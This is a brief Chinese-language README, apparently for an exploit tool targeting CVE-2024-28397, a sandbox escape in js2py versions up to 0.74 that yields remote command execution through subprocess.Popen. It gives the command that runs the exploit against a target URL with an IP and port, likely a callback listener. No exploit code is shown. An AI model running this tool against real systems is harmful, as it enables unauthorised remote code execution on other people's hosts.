
js2py <= 0.74沙箱逃逸(CVE-2024-28397)
用于通过沙箱逃逸实现远程命令执行(RCE)的漏洞利用程序,针对 js2py <= 0.74。
允许通过不安全的JavaScript评估在宿主机上执行任意代码。
subprocess.Popen 执行命令依赖项:
pip install -r requirements.txt
python3 exploit.py -U http://target_url -H IP -P PUERTO
本项目仅用于教育目的和授权安全审计。
作者不对本工具的滥用承担任何责任。